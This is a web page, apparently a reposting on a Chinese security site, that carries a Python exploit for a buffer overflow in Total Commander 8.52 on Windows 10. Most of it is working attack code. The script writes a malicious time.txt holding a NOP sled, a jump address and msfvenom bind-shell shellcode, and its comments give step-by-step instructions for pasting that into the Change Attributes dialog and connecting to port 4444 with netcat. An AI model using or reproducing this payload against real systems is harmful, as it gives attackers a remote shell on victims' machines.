Total Commander 8.52 - Buffer Overflow (Windows 10)
|
来源:vfocus.net 作者:VIKRAMADITYA 发布时间:2015-09-21
|
|
#!/usr/bin/python # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Credits: Un_N0n # Date of Testing: 19th September 2015 # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe # Tested On : Windows 10 # Steps to Exploit # Step 1: Execute this python script # Step 2: This script will create a file called time.txt # Step 3: Copy the contents of time.txt file # Step 4: Now open Total Commander 8.52 # Step 5: Go To file > Change Attributes. # Step 6: In time field paste the contents of time.txt # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc file = open('time.txt' , 'wb'); buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS # msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d' buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1" "\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28" "\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c" "\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2" "\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a" "\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48" "\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91" "\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15" "\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e" "\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e" "\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd" "\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8" "\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b" "\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba" "\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01" "\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b" "\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf" "\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24" "\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc" "\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc" "\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42" "\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52" "\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30" "\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68") buffer += "\x90" *10 file.write(buffer) file.close()
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|